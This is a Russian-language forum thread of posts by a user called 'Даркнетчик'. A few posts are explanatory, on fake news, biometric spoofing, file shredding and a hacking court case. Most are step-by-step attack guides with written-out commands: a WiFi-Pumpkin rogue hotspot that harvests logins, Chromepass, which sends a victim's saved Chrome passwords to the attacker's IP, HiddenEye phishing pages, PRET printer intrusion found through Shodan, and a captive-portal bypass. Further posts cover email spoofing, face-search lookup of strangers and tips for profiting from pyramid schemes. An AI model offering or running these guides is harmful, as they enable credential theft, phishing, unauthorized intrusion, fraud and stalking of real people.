Даркнетчик.

Путник

Профессионал
Private Club
Старожил
Меценат
Регистрация
3/10/16
Сообщения
4.232
Репутация
6.431
Реакции
23.016
RUB
0
Сделок через гаранта
15
Fake News. Как создаются фейковые новости и можно ли их распознать
8 июня 2020 от Даркнетчик
Фейковые новости влияют на политику больших стран, их создатели зарабатывают немалые деньги, используя различные схемы монетизации, а в будущем fake news смогут сокрушать бизнесы. Рассказываю, кто и зачем создает фейковые новости, как организуются поддельные информационные кампании и как распознать фейк обычному пользователю.
Разбираемся в понятиях
В самом названии fake news есть немного фейка: перевод калькой этого сочетания слов искажает смысл понятия, потому что поддельные новости существовали всегда. Еще в XIII веке до н.э. цари Египта и Хеттского государства начертали на камнях своих дворцов сообщения о победе в битве, которая на самом деле завершилась вничью. В 1835 году (эпоха профессиональной журналистики в разгаре) газета The New York Sun удвоила продажи сообщив, что астроном разглядел в сверхмощный телескоп человекоподобных жителей Луны. В XX веке с поддельной новости о захвате радиостанции началась Вторая Мировая война.
Во всех перечисленных примерах распространить информацию наширокую аудиторию можно было только через определённый канал связи с ней — камень на стене дворца, газету, радио (на смену которому пришло телевидение). Доступ к нему для желающих распространить такую информацию был строго ограничен.
В наше время генерировать и распространять fake news (будем называть их «фейковыми новостями») может любой, потому что в начале XXI века появились социальные сети, которые стали самостоятельной и неограниченной медиасредой. Рост их аудитории и разнообразие форматов информации (текст, фото, аудио, видео, трансляции) привели к «демократизации рупоров», которые ранее были только в руках властей или профессионалов. Более того, именно в соцсетях транслятор фейковых новостей общается с аудиторией напрямую, минуя журналистов, государственную цензуру и другие фильтры.

А если задействовать в соцсетях технические и коммуникационные технологии, любое фейковое сообщение можно распространять не хуже вечерних новостей Первого канала. Нужен только специфический мотив.

image
Три составляющих фейковых новостей: соцсети, телекоммуникационные технологии и специфическая мотивация. Источник: TrendMicro

Устанавливаем мотивы
Фейковые новости практически всегда либо про политику, либо про деньги. Политических манипуляторов привлекает в соцсетях их «народный» характер, а коммерческих злоумышленников — ещё и монетизация.
Политика. Чаще всего fake news генерируются для влияния на выборы или какую-либо политическую фигуру. Традиционные источники информации для этого не совсем подходят, ведь обычный человек всё более склонен верить «таким же простым людям, как и он» в соцсетях, а не «аффилированным с государством или корпорациями» СМИ. Именно поэтому фейковые новости создаются с прицелом на соцсети — здесь у каждого участника есть определённый «соседский» круг доверия.
Деньги. Создавая фейковые новости, можно усиливать активность определённых групп потенциальных клиентов. «Только три знака зодиака переживут 2020 год…» — кликбейт-заголовок, который в итоге может привести на посадочную страницу сервиса платной рассылки гороскопов. Соцсеть в этом случае играет роль хирургически точного инструмента вовлечения нужных групп потенциальных клиентов в орбиту влияния бренда. А пережив 2020 год, представители «неудачливых» знаков уже и не вспомнят о короткой новости, репост которой они увидели в тематической группе.
В будущем появится ещё и третий мотив — конкуренция, то есть фейковые новости всё чаще будут создавать для подрыва репутации бизнеса. К примеру, в 2017 году Комиссия по ценным бумагам и биржам США «накрыла» целую сеть сайтов, на которых публиковались платные новостные и псевдоаналитические статьи об определённых компаниях с негативными прогнозами об котировках их акций. Как показало дальнейшее исследование, фейковые материалы действительно влияли на цены и объём сделок с акциями небольших компаний.
Далее разберём, как, собственно, работает механизм создания и распространения фейковых новостей.

Разбираем алгоритм
Фейковые новостные кампании обычно проходят в несколько этапов, хотя это процесс творческий, и в зависимости от целей или особенностей аудитории некоторые стадии могут быть опущены.
1. Разведка
На первом этапе организатор кампании изучает целевую аудиторию. Он отвечает на три основных вопроса: «Кому врать?», «О чём врать?» и «Зачем врать?». Анализ проводится самый широкий — от образовательного уровня и информационной грамотности будущих читателей до их взглядов на жизнь. Собственно, на этом этапе и были пойманы специалисты Cambridge Analytica, которые собирали персональные данные пользователей Facebook для политических целей.

На втором этапе создаётся, собственно, фейковая новость. Её главная особенность в том, что почти всегда «декорации» фальсифицированной истории, то есть участники события, место и время действий, — реальные, а фейком является, собственно, само событие.

В зависимости от масштабов компании, фейковых новостей может быть несколько. К примеру, первая история сообщает о событии, а последующие — развивают тему. Иногда к ним примешиваются даже настоящие новости, которые дополняют картину выдуманной истории. Они направлены на скептическую часть потенциальной аудитории.

Помимо новостей, на втором этапе создаются агенты распространения: фейковые пользователи соцсетей, фейковые новостные сайты, фейковые группы и сообщества. Для этого в ход идут чёрные и белые технологии SMM, позволяющие за деньги плодить и продвигать поддельных пользователей соцсетей. К примеру, в соцсети Weibo (китайский аналог Twitter) селебрити с 300 тыс. подписчиков можно создать примерно за 2,5 тыс. долларов всего за месяц.

3. Распространение
Обычно фейковая новость сперва появляется на таком же фейковом сайте новостей или на любой другой площадке, где публикации никак не контролируются. Далее в дело вступает «гуру» — прокачанный и авторитетный у целевой аудитории блогер, который публикует новость у себя. Сообщение подхватывают боты — реальные пользователи соцсетей или роботы, созданные/привлечённые специально для фейковой новостной кампании. Помимо распространения, они выполняют очень важную функцию — изолируют скептиков, которые остаются в меньшинстве и предпочитают сохранять молчание вместо противостояния фейкам.
4. Эксплуатация
На следующем этапе новость доходит до целевой аудитории и начинает жить своей жизнью. Наиболее вдохновлённые читатели лайкают и репостят фейковое сообщение, делятся им в мессенджерах. Возникает вирусный эффект, который привлекает внимание ещё более широкой аудитории — журналистов и других профессиональных участников медиаполя. Фейковая новость попадает в мейнстрим-медиа. Иногда случаются курьёзы, когда фейковая новость сама всплывает через годы. К примеру, в 2017 году многие мировые СМИ сообщили о российской радиоэлектронной бомбе, якобы способной выводить из строя корабли. При этом впервые информация об этом появилась в соцсети Facebook ещё в 2014 году, когда фейковый «моряк» рассказал о воздействии «электронной бомбы» с самолёта СУ-24 на американский эсминец «Дональд Кук». Впоследствии всё было опровергнуто.

После достижении заданной цели могут потребоваться дополнительные, закрепляющие действия. К примеру, если речь идёт о кампании, подрывающей репутацию какого-либо политика, в информационное поле могут быть запущены позитивные новости о нём, которые не имеют прямого отношения к фейковой истории, но несколько корректируют образ жертвы в глазах общественности. Такие действия призваны устранить у общественности ощущение травли или спланированной акции в отношении политика.

7. Заметание следов
Последний этап — сокрытие следов активности. Наиболее распространённая технология позволяющая это сделать, — отвлекающая новость. Используя уже созданную инфраструктуру из ботов можно вбросить новое «информационное» сообщение. По своей тематике оно должно совершенно отличаться от прежней фейковой истории, быть ещё более громким и резонансным. Такая фейковая новость переключает внимание общественности на новую проблему и «глушит» голоса тех, кто, возможно, к этому моменту сумел идентифицировать прежний фейк.

Теперь, разобравшись в алгоритмах, давайте посмотрим на фейковую новость не глазами создателей, а со стороны аудитории. И выясним параллельно, как противостоять fake news?

Вырабатываем «иммунитет»
Поскольку fake news бьют прямой наводкой по пользователям, первый рубеж обороны могут составить только сами читатели. Прежде всего, они должны определять фейковые новости по следующим признакам:

1. Гиперболизированные и кликбейтные заголовки.
image
Новостные заголовки обычно передают суть информационного сообщения, а не создают загадок

image
Когда умирает действительно «легендарный рок-музыкант, хиты которого знают все» достаточно написать его имя, чтобы привлечь внимание читателей
Заголовки новостей коротко описывают суть произошедшего. В противном случае лучше новость проигнорировать.
2. Подозрительные домены или искажённые названия сайтов популярных медиа, похожие на настоящие
Примеры таких сайтов можно посмотреть, к примеру, здесь.
Забейте в поисковик название интересующего вас СМИ — на первых позициях в выдаче будут оригиналы. Сравните их интернет-адресом подозрительного источника.
3. Большое количество ошибок или опечаток в тексте новости
Попробуйте найти на сайтах известных вам СМИ эту же историю, но в более развёрнутом виде. Если поиски не увенчаются успехом, то, скорее всего, перед вами автоматически сгенерированный контент.
4. Поддельные фото или коллажи
image
Фотоколлаж рассчитан на невнимательного читателя и призван иллюстрировать несостоявшееся событие
Попробуйте сохранить подозрительное фото и поискать его копии через фотопоисковики (Google, TinEyE и т.п.). Если копий нет в авторитетных источниках, то скорее всего перед вами фотошоп.

5. Отсутствие отметок о времени публикации новости
Даты публикации скрывается для того, чтобы максимально продлить «жизнь» фейковой новости. Такое сообщение будет казаться актуальным сколь угодно долго, пока не будет явно противоречить действительности.

Забейте заголовок подозрительной новости и попробуйте поискать его, используя фильтры времени. Скажем, укажите прошлый год или прошлый месяц. Если вы найдёте аналогичную новость в архивах, то скорее всего это фейк.

6. Отсутствие указания автора и источника
Многие фейки генерируются автоматизировано, поэтому никаких упоминаний ни автора, ни источника не остаётся. Тем не менее в последнее время фейковые новости выходят за авторством никому не известных журналистов — скорее всего их имена также случайны, и за ними не стоят реальные люди.
Попытайтесь найти новость или её авторов в мейнстрим-media. Прежде всего — в информационных агентствах.
Если же источники указаны, то попробуйте изучить их. Источники типа «Wikipedia» или «LiveJournal» — это скорее попытки скрыть реальные источники информации или их отсутствие.

В заключение
Отметим, что на уровне разных государств принимаются меры борьбы с фейковыми новостями. Среди прочего власти и инициативные группы из журналистов и общественных деятелей создают сайты, который полностью посвящены отслеживанию и фиксации фейковых новостей. Соцсети ведут разработки автоматизированных систем поиска, маркировки и удаления неблагонадёжной информации. Крупнейшие производители средств информационной безопасности, такие как Trend Micro, пользуясь накопленным опытом в области машинного интеллекта, помогают социальные сетям вычислять профили «ботов», за которым нет реальных пользователей. Но как всегда в области кибербезопасности, первый рубеж обороны — рациональный поход пользователя к обращению с технологиями и медиасредой.
 
IMG_20200609_175740_883.jpg


Как безопасно запускать подозрительные программы

Добрый вечер, друзья. Уверен, что у вас часто бывают случаи, когда вы сомневаетесь в безопасности скачиваемого файла. Что же делать в этом случае? Подозрительный файл можно легко и быстро проверить при помощи Hybrid Analysis. Это бесплатный онлайн-сервис для проверки файлов и веб-страниц на предмет заражения вредоносным кодом.

В отличие от VirusTotal, представляющего собой некий «консилиум» антивирусов, Hybrid Analysis является песочницей. Когда вы отправляйте файл на проверку, сервис запускает его в изолированной среде VirtualBox или VMware, а затем смотрит, как он поведет себя в системе. На основании произведенных файлом изменений выдается заключение о его безопасности или вредоносности.

При отправке файла на анализ пользователь может выбрать ОС, в которой он будет запущен на исполнение. Доступны Windows 7, Linux Ubuntu и Android. По завершении анализа вы получите общий отчет VirusTotal и результаты гибридного и сетевого анализа с прилагаемыми скриншотами запуска в виртуальной системе.
 
IMG_20200610_175013_345.jpg

Access granted. Можно ли обмануть биометрические системы и как это сделать
Биометрия — это распознавание личности по физическим или поведенческим чертам. Отпечатки пальцев, сетчатка глаза, форма лица, голос и даже походка — все это биометрические параметры, которые можно использовать для идентификации личности.
Обыватель чаще видит биометрическое распознавание в кино, чем в реальной жизни. Но и в простых бытовых ситуациях с этими технологиями можно столкнуться. Например, Touch ID на iPhone — как раз биометрическое распознавание. Можно ли обмануть биометрию? Об этом в статье.
Немного о Touch ID
Подобный метод распознавания считается наиболее совершенным, так как идентификация ведется по уникальным маркерам, в теории присущим только лишь одному конкретному человеку и никому более. Пароль можно подобрать или подслушать, с ключа сделать копию, а вот отращивать точно такой же палец как у нужного человека, да с таким же узором на подушечке еще никто не научился.
IMG_20200610_175152_538.jpg
Как «угнать» палец
Однако и подобные системы распознавания можно обмануть. И мы сейчас не говорим об отрезании пальца, хотя подобными методами сейчас пользуются, например, угонщики автомобилей. Сенсор распознавания отпечатков можно обвести вокруг пальца банальным слепком.
Уже несколько лет назад подобный метод продемонстрировали сотрудники компании Vkansee. Хваленый эппловский Touch ID распознает линии на подушечках пальцев, но не распознает материал. Парни из Vkansee продемонстрировали, что точно так же как на палец владельца, сенсор реагирует на слепок. Эксперимент провели с двумя вариантами материала — обычным детским пластилином и стоматологическим силиконом (его используют для создания зубных слепков). В обоих случаях Touch ID не распознал подмены.
Согласны, это скорее proof-of-concept метод, концептуальное исследование, показывающее теоретическую возможность взлома. В реальности такое представить тяжело — разве что во второсортном фильме, где важного человека зовут на утренник в детском саду и подсовывают ему пластилин, поиграть немного с детьми.
IMG_20200610_175159_208.jpg
Но что, если мы скажем вам, что получать слепок напрямую вовсе не обязательно? Да, отпечатки пальцев можно получить, даже не приближаясь к нужному человеку. Слепок можно сделать даже по фотографии — очень высокого качества, конечно. Такую возможность хорошо продемонстрировал немецкий хакер Ян Кресслер. Используя снимки немецкого министра обороны Урсулы фон дер Лейен, Кресслер при помощи специального софта создал модель отпечатков чиновницы. Причем одно фото хакер сделал самостоятельно, а за вторым вообще далеко ходить не пришлось — оно было в официальном пресс-релизе министерства.
«Самый простой способ сделать снимок радужной оболочки — при помощи цифровой камеры в режиме ночной съемки, либо удалить из нее инфракрасный фильтр. В спектре инфракрасного света (который обычно фильтруется) хорошо различимы мелкие, обычно трудно различимые детали радужной оболочки темных глаз», — пишут хакеры из сообщества Chaos Computer Club.
"Хорошей цифровой камеры с 200-миллиметровым объективом на расстоянии до 5 метров достаточно для того, чтобы сделать снимок радужной оболочки с нужным разрешением.”
IMG_20200610_175205_137.jpg
Систему распознавания лиц тоже можно обмануть. Специалисты по кибербезопасности из фирмы Bkav продемонстрировали, что алгоритм Face ID от Apple можно взломать при помощи все тех же контактных линз и 3D-маски лица, сделанной на принтере. Система распознавания, в которой задействованы обычная и инфракрасная камеры, точечный проектор, алгоритмы машинного обучения, защищенное хранилище и защищенная же обработка данных, оказалась вполне себе дырявой.
Специалисты из Bkav соглашаются, что подобный метод обмана биометрических систем довольно трудозатратен и требует много времени. Но в случаях с «большими шишками» он может быть и оправдан. В Bkav не рекомендуют пользоваться Face ID и подобными алгоритмами при бизнес-транзакциях, а также предостерегают известных людей от пользования этими системами.
Будущее наступило, и оно разочаровывает
Кажется, биометрические системы безопасности ничуть не безопаснее классических кодов и паролей. Пароль можно выучить и не хранить нигде, кроме своей головы — а как скрыть от других свои глаза и отпечатки пальцев? Вечные очки и перчатки?
Еще одна важная проблема кроется как раз в уникальности биометрических данных. В случае взлома условного хранилища паролей его можно заменить. А чем заменить отпечаток пальца, если вдруг базу отпечатков «угонят» хакеры?
Скорее всего, биометрия может быть только дополнением к классическим методам безопасности, но никак не самостоятельной технологией. То, что пару десятков лет назад казалось вершиной прогресса, сегодня разочаровывающе несовершенно.

На сегодня все, друзья. С вами был Даркнетчик
 
IMG_20200611_133412_380.jpg

Как отправлять письма с чужого Email

Добрый вечер, друзья. Если вы думаете, что электронные письма всегда приходят только от того, кто указан в графе отправителя, то вы сильно заблуждаетесь. На самом деле, электронную почту почти от любого отправителя достаточно легко подделать.

У данного сервиса присутствует возможность отправлять электронные письма с любого Email-а, добавляя вложения и шифрование. Дополнительно, присутствуют расширенные возможности отправки.

⚠️ Вы можете отправить письмо с почты поддержки Google или от имени вашего начальника.

Настройка

1. Сперва переходим на сайт и активируем перевод страницы, если это требуется.
2. Теперь заполняем поля. Первое поле: имя отправителя. Второе поле: почта отправителя. Третья строка: принимающий адрес почты. Ну а дальше, тема письма и вложение.
3. Теперь вписываем само содержимое будущего письма.
4. Остаётся лишь пройти капчу и нажать кнопку «Послать».

Письмо успешно отправлено. Также можете заглянуть в раздел «Расширенные настройки», уверен, вы найдете пару интересных пунктов.

Screenshot_20200611-133509.png
 
IMG_20200612_092137_178.jpg

Как защитить удаленные файлы от восстановления

Вечер добрый, друзья. Сегодня мы поговорим об удалении файлов. Далеко не многие знают, что при удалении документа, фотографии и любого другого файла посредством rm или через файловый менеджер, сам файл не удаляется, а затирается лишь его индекс и пространство, которое занимал файл, Сам файл остается на своём месте и восстановить его не составит большого труда.

К счастью, существует утилита под названием Shred. Она способна перезаписывать файлы неограниченное количество раз. Shred случайными числами заполняет место, занятое файлом. И уже, даже восстановив ваш удалённый файл, его будет невозможно прочитать. Кстати, по умолчанию Shred не удаляет файл, для этого используется параметр -remove (-u).

Настройка

Скачиваем Kali Linux

❗️Программа предустановлена в Kali Linux.

Использование

▫️shred Ключ файл

Пример использования

▫️shred -zvu -n 5 file.list

▫️файл - file
▫️z - скрыть перезапись
▫️v - показать ход перезаписи
▫️u - удалить файл после перезаписи
▫️n 5 - перезаписать файл 5 раз

#безопасность
 
Как перехватить данные

Добрый вечер, друзья. Каждый день мы немало времени проводим в сети, ведь интернет в наше время позволяет потреблять огромное количество информации, дает работу и в целом упрощает нашу жизнь. А теперь представьте ситуацию, когда нужно срочно
выйти в сеть, но мобильный интернет не ловит или же попросту закончился.

К сожалению, многие люди в таких ситуациях начинают искать незащищенные точки доступа, тем самым подвергают свои данные огромной опасности, так как очень часто незапароленная "общественная" Wi-Fi сеть оказывается точкой доступа для перехвата данных. Все данные, которые введет человек, подключенный к такой сети, отправиться напрямую к мошеннику.

?‍? Предлагаю вам проверить, как работает эта система изнутри и создать свою точку для перехвата данных.

1. Для начала скачиваем Kali Linux

2. Заходим в терминал и прописываем команды для установки WiFi-Pumpkin:

▫️git clone
▫️cd WiFi-Pumpkin
▫️chmod +x installer.sh
▫️sudo ./installer.sh --install

3. Запускаем WiFi-Pumpkin

▫️wifi-pumpkin

После запуска у вас откроется интерфейс wifi-pumkin. Перейдите во вкладку Setting и дайте имя свое точке доступа. Далее в Activity Monitor settings ставьте галочки на HTTP-Requests (веб-запросы), HTTP-Authentication (учётные данные с веб-сайтов) и Pumpkin-Proxy. Во вкладке Plugins (плагины) выберите, что вам важнее. Pumpkin-Proxy позволяет использовать различные готовые решения (кейлогеры, BeEF, внедрение кода и т.д.) Зато SSLStrip+ в паре с dns2proxy позволяют обходить HTTPS и перехватывать намного больше учётных данных.
 
IMG_20200614_183056_161.jpg


Программы для перебора паролей
Лучшие проги по перебору паролей
1. John the Ripper
2. Aircrack-ng
3. RainbowCrack
4. THC Hydra
5. HashCat
6. Crowbar
7. coWPAtty
ЧТО ТАКОЕ ВЗЛОМ ПАРОЛЕЙ?
В области кибербезопасности и криптографии взлом паролей играет очень важную роль. Это процесс восстановления пароля с целью нарушения или восстановления безопасности компьютера или системы. Итак, почему вам нужно узнать программы перебора паролей? В мирных целях можно использовать взлом паролей для восстановления забытых паролей от онлайн аккаунтов, также это используется системными администраторами для профилактики на регулярной основе.
Для взлома паролей в большинстве случаев используется перебор. Программное обеспечение генерирует различные варианты паролей и сообщает если был найден правильный. В некоторых случаях персональный компьютер способен выдавать миллионы вариантов в секунду. Программа для взлома пароля на пк проверяет все варианты и находит реальный пароль.
Время, необходимое для взлома пароля пропорционально длине и сложности этого пароля. Поэтому рекомендуется использовать сложные пароли, которые трудно угадать или подобрать. Также скорость перебора зависит от криптографической функции, которая применяется для генерации хэшей пароля. Поэтому для шифрования пароля лучше использовать Bcrypt, а не MD5 или SHA.
Атака по словарю - для атаки используется файл, который содержит список слов. Программа проверяет каждое из слов, чтобы найти результат;
Атака Bruteforce - можно не использовать словарь, а перебирать все комбинации заданных символов;
Атака с помощью радужных таблиц - в атаке используются предварительно вычисленные хэши, поэтому она быстрее.
Есть и другие методы взлома паролей, основанные на социальной инженерии, но сегодня мы остановимся только на атаках без участия пользователя. Чтобы защититься от таких атак нужно использовать только сложные пароли. А теперь рассмотрим лучшие инструменты для взлома паролей 2017. Этот список опубликован только для ознакомительных целей и мы ни в коем случае не призываем взламывать чужие личные данные.
Мы не призываем вас к каким-либо действиям, статья написана исключительно
в ознакомительных целях, мы не несем никакой ответственности за ваши
действия. Чтобы и вам не пришлось нести ответственности, например,
уголовной, рекомендуем использовать анонимайзеры при работе с серыми
 
IMG_20200615_095101_001.jpg

Как найти человека по фотографии

Добрый вечер, друзья. Представьте себе такую ситуацию: у вас есть фото человека, но при этом вы не знаете его ФИО, или же в соцсетях этого человека ФИО заменено псевдонимом. Знакомая ситуация?

Чтобы «пробить» человека через соц. сети, имея лишь фотографию, можно воспользоваться довольно популярным сервисом FindClone. На сегодняшний день он является самым проверенным и эффективным.

Использование

Сперва Вам нужно пройти регистрацию и загрузить фото человека, на котором отчетливо видно лицо человека. После этого будет произведен поиск в социальной сети «ВКонтакте».

Одной из особенностей этого сервиса является то, что он может найти профиль человека, даже если страница закрыта, а фотография в профиле нигде не светилась и не кэшировалась.
 
IMG_20200615_210649_269.jpg


5 секретов успешного заработка на пирамидах

1. Вкладывать только свободные деньги.
В 90 годы люди несли последние деньги в пирамиды в надежде заработать, а потом оставались без квартир, машин и даже штанов. Руководствуйтесь советом - инвестируйте столько, сколько не жалко потерять. Лично я начал с суммы в 100 тысяч рублей, это были свободные деньги, с которыми в случае чего я готов был расстаться.
2. Не вкладывать в один проект все средства.
По другому это называется диверсификация рисков, когда вы распределяете свой бюджет на несколько компаний. Так всегда шансов заработать больше. По личному опыту около половины пирамид схлопывается в первый месяц работы. В идеале распределить банк на 10 проектов. Так и следить удобно и процент сгорания всех денег падает.
3. Участвовать на самом старте проекта.
Следует искать проекты, которые еще не разрекламированы в соц сетях. Большая ошибка новичков - вкладывать в уже известную пирамиду. Также не следует отдавать деньги в проект, который существует больше месяца. Чем дольше существует сайт пирамиды, тем меньше Вы заработаете на нем.
4. Не ждать разорения и закрытия проекта.
Также к этому пункту можно отнести - ни в коем случае не реинвестировать прибыль. Как только деньги падают на баланс (обычно каждые сутки), их стоит оттуда снимать на свой кошелек. Через ~полтора месяца вывели вложенные средства и каждый день уже капает доход, который также следует выводить. Редко когда пирамида живет более 3 месяцев.
5. Не страдать из-за потерянных денег.
Этот пункт вытекает из первого. Если Вы вложили и потеряли свободные деньги, то и переживать по этому поводу не надо. Относитесь к этому как к игре, не делайте больших ставок на постоянный доход от подобного вида заработка. Важно помнить, что только инвестирование с холодной головой спасет от провала.
btc чек на 300₽ - тык
Также из личного опыта добавлю, что средний период возврата всех средств должен составлять 2 месяца (учитывая что некоторые проекты закрываются через месяц).
 
IMG_20200616_102758_312.jpg



Как получить безлимитный Google Диск

Вечер добрый, дорогие друзья. Сегодня я вам покажу, как можно получить безлимитный Google Диск вместо стандартных 15 ГБ хранилища. Да, многие из вас не пользуются этим хранилищем, но кому-то эта информация может быть полезной.

Недавно я обнаружил один интересный сайт, с помощью которого вы можете бесплатно получить неограниченное пространство для своего аккаунта.

Настройка?‍?

1. Сначала нам нужно перейти на данный сайт.
2. В первое поле прописываем желаемое имя, будущего диска.
3. Во второе поле вписываем ваш адрес электронной почты Google.
4. Теперь, проходим капчу и нажимаем кнопку «получить» (Get!).
5. Остается только немного подождать, пока не высветиться окно, в котором нужно нажать «ОК».

Поздравляю, вы получили безлимитный, а главное бесплатный Google Drive для личного пользования.

Можете проверить наличие нового пространства по этой ссылке или в мобильном приложении во вкладке «Общие диски».
 
IMG_20200618_001319_423.jpg

Как удаленно получить доступ к сохраненным паролям Chrome

Добрый день, друзья. На сегодняшний день Google Chrome является самым популярным браузером - его используют 86% пользователей интернета. Этот браузер хранит очень много полезной инфы о каждом пользователе.

Chromepass - это консольное приложение на Python, которое умеет добывать сохраненные пароли в Chrome. Требуется Python 3.6+.

Итак, в терминале:
$ cd chromepass
$ pip install -r requirements.txt
$ python -m pip install --upgrade pip
$ python -m pip install -r requirements.txt
$ python create_server.py

Далее, выберите метод client.exe, введите свой IP. Включите сообщение об ошибке (если нужно) и добавьте свое сообщение при необходимости.

Теперь подождите, пока исполняемые файлы будут готовы. Запустите client.exe. Файл server_ip.exe — должна получить жертва. После этого, в client.exe начинают появляться пароли.
 
IMG_20200618_171059_045.jpg

Как создать фишинг-сайт

Добрый день, друзья. На сегодняшний день фишинг является одним из самых распространенных методов кражи данных. Суть в том, что информация, введенная на фишинговом сайте, отправляется прямиком к создателю этой страницы.

На мой взгляд, самой лучшей утилитой для создания фишинг страницы является HiddenEye. Она включает в себя
34 сайта и позволяет отправлять полученные данные прямо на почту.

❗️Вся информация предоставлена исключительно в ознакомительных целях.

Настройка?‍?

Устанавливаем Termux

Прописываем команды в консоль:

▫️pkg install git python php curl openssh grep
▫️git clone -b Termux-Support-Branch
▫️chmod 777 HiddenEye
▫️pip install requests
▫️cd HiddenEye
▫️python HiddenEye.py
 
IMG_20200619_151411_365.jpg

Как хакеры взломали РЖД и получили от 10 до 13 лет тюрьмы

В начале 2020 года Басманный суд города Москвы вынес приговор трем россиянам, взломавшим системы РЖД. В 2014-2014 годах они незаконно оформили более 5000 электронных маршрутных квитанций на общую сумму более 17 000 000 рублей (взломщики занимались фиктивным возвратом билетов).

Максим Матюшев, Андрей Жданов и Кирилл Кулабухов были признаны виновными в организации преступного сообщества, участии в преступном сообществе и мошенничестве в сфере компьютерной информации. Матюшев приговорен к 13 годам лишения свободы с отбыванием в колонии строгого режима, Жданов — к 12,5 года колонии строгого режима, Кулабухов — к 10 годам колонии общего режима.

В 2013-2014 годах осужденные совершили более 60 эпизодов мошенничества и действовали на территории Москвы, Санкт-Петербурга, Владимира, Новосибирска, Уфы, Московской области и Алтайского края. Хакеры рассылали организациям, осуществляющим продажу железнодорожных билетов, электронные письма с малварью. Когда адресат открывал письмо, программа устанавливалась в операционную систему, и злоумышленники получали полный доступ к личным кабинетам кассиров организаций.

Получив доступ к интерфейсу кассира, мошенники вводили информацию о подставных пассажирах в электронную квитанцию и осуществляли платеж за счет средств организации, после чего обналичивали денежные средства путем сдачи билетов в железнодорожные кассы.

В общей сложности по делу был допрошен 31 потерпевший и более 190 свидетелей.
 
IMG_20200620_175401_139.jpg


Как взломать принтер с помощью телефона

Добрый вечер, друзья. Вы когда-нибудь задумывались, зачем хакеры проводят атаки на принтеры? Дело в том, что принтеры могут раскрыть гораздо больше информации, чем кажется.

Целью атаки может быть память NVRAM устройства, в котором могут находиться данные для входа (пароль). Кроме того, таким образом можно получить доступ к файловой системе, в которой находятся файлы конфигурации и данные аутентификации аккаунтов. Это лишь основные причины взлома таких информационных носителей, но на самом деле их гораздо больше.

Итак, приступим к взлому?‍?

Устанавливаем Termux

Прописываем команды в консоль:
▫️git clone
▫️cd PRET
▫️pip install colorama pysnmP

Теперь переходим на сайт Shodan и в строке поиска вводим такой запрос:
port:9100 pjl

Выбираем нужны нам IP принтера, переходим обратно в терминал и вводим:
▫️python2 pret.py (ip адрес жертвы) pjl

Проникновение завершено. Теперь остается ввести в терминале help и вы увидите какие манипуляции можно провести с выбранным вами принтером.
 
IMG_20200621_232321_856.jpg


Как обойти авторизацию Wi-Fi

Добрый вечер, друзья. Сегодня мы часто сталкиваемся с ситуацией, когда необходимо получить доступ в интернет. В кафе, ресторане или в общественном месте всегда можно найти точку доступа. Нередко попадаются роутеры с «гостевым доступом». Но бывает, что бесплатный Wi-Fi защищен Captive Portal.

Иными словами, имеется открытая сеть Wi-Fi, к которой можно подключиться без пароля, но при попытке зайти на любой сайт, нас будет перебрасывать на страницу, где нужно ввести учётные данные, оплатить, подтвердить номер телефона с помощью СМС или что-то похожее.

Конечно, желания оплачивать такую услугу совершенно нет, поэтому я предлагаю вам воспользоваться утилитой, которая будет обходить данную защиту.

Настройка?‍?

1. Скачиваем Kali Linux

2. Заходим в терминал и прописываем команды для установки hack-captive-portals

▫️sudo apt -y install sipcalc nmap
▫️wget
▫️sudo chmod u+x hack-captive.sh
▫️sudo ./hack-captive.sh

Использование

▫️sudo ./hack-captive.sh

После фразы "Pwned! Now you can surf the Internet!", вы можете спокойно пользоваться интернетом✅.
 
IMG_20200622_085635_158.jpg


Кибершпионаж − настолько широкое понятие, что нет никакой возможности написать о нем в рамках одной главы. Потому я вынужден ограничиться рассмотрением лишь некоторых моментов, и в рамках данной главы будет рассмотрен кибершпионаж при помощи вредоносного программного обеспечения и промышленный кибершпионаж.
Кибершпионаж при помощи вредоносного программного обеспечения
Современный человек носит в своем кармане мобильный телефон, имеющий с высокой вероятностью микрофон, две камеры и датчик GPS/ГЛОНАСС. Эти технологии позволяют прослушивать помещение по периметру, наблюдать через камеры и отслеживать передвижение владельца. Про получение доступа к звонкам, перепискам, электронной почте можно и не говорить.
Вы думаете, это теоретические угрозы? Вы слышали про смартфоны компаний Xiaomi, Huawei или Lenovo? А вы знаете, что некоторое время назад эти компании были пойманы на поставках телефонов со встроенным шпионским ПО. И это не шутка, не домысел и не слух − к сожалению, это чистая правда. Шпионское программное обеспечение могло следить за владельцами, подслушивать звонки и передавать данные недоброжелателям. Не факт, что виноваты производители, весьма вероятно, шпионский софт устанавливался где-то на пути к конечному покупателю.
Может быть, вы думаете, что пользователи iOS в безопасности? Расскажите это известному правозащитнику из ОАЭ Ахмеду Мансуру, в свое время догадавшемуся передать присланную ему на iPhone ссылку специалистам в области компьютерной безопасности. Так было обнаружено вредоносное программное обеспечение Pegasus, эксплуатирующее сразу три 0-day уязвимости в iOS.
Переход по этой ссылке привел бы к заражению устройства и превратил бы его iPhone в идеальный инструмент кибершпионажа. Все владельцы iOS-девайсов должны быть благодарны осторожности Ахмеда Мансура.
Но возможно, вы используете менее распространенную версию мобильной операционной системы или так называемый криптосмартфон вроде BlackBerry или Blackphone? Забудьте про неуязвимую технику: 2018 год начался с Meltdown – обнаружения девятилетней критической уязвимости в процессорах, перед которой уязвимы почти все современные устройства. И эта уязвимость стала одной из самых масштабных и опасных в истории, мир буквально разделился на: до ее обнаружения и после. Потому малораспространенные системы и криптофоны вас не спасут, тем более тот же Blackphone в свое время был взломан на BlackHat за 5 минут...
Кстати, Meltdown коснулась всех операционных систем, включая Windows, macOS, iOS, всех систем на основе Linux. Без обновлений от нее не спасет ни чистый Debian, ни Linux Mint, ни Tails, ни Whonix.
Может быть, вы думаете, что данные возможности доступны только спецслужбам? Действительно, спецслужбы обладают значительно более широким набором ПО и эксплойтов, чем простые пользователи. Разоблачения Эдварда Сноудена и особенно публикации инструментов в Wikileaks весной 2017 года показывают, насколько просто они могут получить доступ к любому компьютеру на планете, но главная проблема заключается в доступности шпионского ПО для простых пользователей. А для заражения неподготовленной жертвы много ума не надо: социальная инженерия, немного времени и денег (по крайней мере, в случае с Android и Windows).
